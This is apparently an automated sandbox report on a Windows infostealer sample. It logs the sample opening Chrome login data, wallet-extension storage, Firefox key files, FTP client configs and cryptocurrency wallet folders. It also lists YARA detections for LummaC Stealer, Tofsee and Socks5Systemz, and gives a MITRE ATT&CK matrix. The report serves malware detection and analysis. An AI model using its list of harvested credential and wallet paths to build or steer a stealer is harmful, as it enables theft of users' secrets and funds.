                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpa
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Armory
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\DashCore\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\Wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Daedalus Mainnet\wallets
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ

                    Remote Access Functionality

                    barindex
                    Yara detected CryptOne packer
                    Source: Yara matchFile source: 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: 0000000D.00000002.2209776881.00000000039E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vn6ZAuKJ8m7U3.exe PID: 6776, type: MEMORYSTR
                    Source: Yara matchFile source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Socks5Systemz
                    Source: Yara matchFile source: 00000005.00000002.2574422459.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2574561504.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ntfs2fat32converter102.exe PID: 8920, type: MEMORYSTR
                    Yara detected Tofsee
                    Source: Yara matchFile source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.2572533022.0000000002780000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2572238453.0000000000550000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2572109142.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 9056, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,5_2_609660FA
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,5_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,5_2_60963143
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,5_2_6096923E
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,5_2_6096A38C
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_6096748C
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,5_2_609254B1
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6094B407
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6090F435 sqlite3_bind_parameter_index,5_2_6090F435
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,5_2_609255D4
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609255FF sqlite3_bind_text,5_2_609255FF
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,5_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,5_2_6094B54C
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,5_2_60925686
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,5_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,5_2_609256E5
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,5_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6092562A sqlite3_bind_blob,5_2_6092562A
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,5_2_60925655
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6094C64A
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_609687A7
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,5_2_6092570B
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095F772
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,5_2_60925778
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6090577D sqlite3_bind_parameter_name,5_2_6090577D
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,5_2_6094B764
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6090576B sqlite3_bind_parameter_count,5_2_6090576B
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,5_2_6094A894
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095F883
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,5_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,5_2_6096281E
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,5_2_6096583A
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,5_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6094A92B
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6090EAE5 sqlite3_transfer_bindings,5_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,5_2_6095FB98
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,5_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,5_2_60966DF1
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_60969D75
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,5_2_6095FFB2

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		131
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		1
                    Deobfuscate/Decode Files or Information                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		14
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts3
                    Native API                    		1
                    Valid Accounts                    		1
                    DLL Side-Loading                    		3
                    Obfuscated Files or Information                    		LSASS Memory1
                    Account Discovery                    		Remote Desktop Protocol31
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Shared Modules                    		5
                    Windows Service                    		1
                    Valid Accounts                    		32
                    Software Packing                    		Security Account Manager12
                    File and Directory Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Command and Scripting Interpreter                    		1
                    Bootkit                    		11
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS67
                    System Information Discovery                    		Distributed Component Object ModelInput Capture4
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts2
                    Service Execution                    		Network Logon Script5
                    Windows Service                    		11
                    Masquerading                    		LSA Secrets571
                    Security Software Discovery                    		SSHKeylogging135
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable Media1
                    PowerShell                    		RC Scripts512
                    Process Injection                    		1
                    Valid Accounts                    		Cached Domain Credentials1
                    Process Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items341
                    Virtualization/Sandbox Evasion                    		DCSync341
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
